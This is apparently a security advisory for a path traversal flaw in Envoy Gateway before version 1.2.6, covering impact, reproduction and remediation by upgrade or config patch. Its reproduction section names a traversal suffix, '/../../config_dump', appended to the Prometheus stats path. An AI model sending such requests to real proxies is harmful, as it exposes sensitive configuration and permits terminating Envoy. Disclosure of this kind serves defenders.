Envoy Gateway Path Traversal Vulnerability Allowing Unauthorized Access to Admin Interface Commands

A path traversal vulnerability has been identified in Envoy Gateway versions prior to 1.2.6. This vulnerability allows users with access to the Kubernetes cluster to execute commands from the Envoy Admin interface on proxies managed by Envoy Gateway. The Admin interface can be used to terminate the Envoy process and extract the Envoy configuration, which may contain sensitive data.

Impact

Exploitation of this vulnerability could lead to unauthorized access to the Envoy Admin interface, allowing for destructive actions such as terminating the Envoy process and accessing confidential information from the Envoy configuration.

Reproduction

To reproduce this vulnerability, send a request to the Envoy proxy's Prometheus stats endpoint using a path traversal technique. The request can include the '/../../config_dump' suffix to access the configuration dump, which may contain sensitive information.

Remediation

Envoy Gateway users can update to version 1.2.6 or later to address this vulnerability. Alternatively, a bootstrap config patch can be applied using the EnvoyProxy API to restrict access to the Prometheus stats endpoint.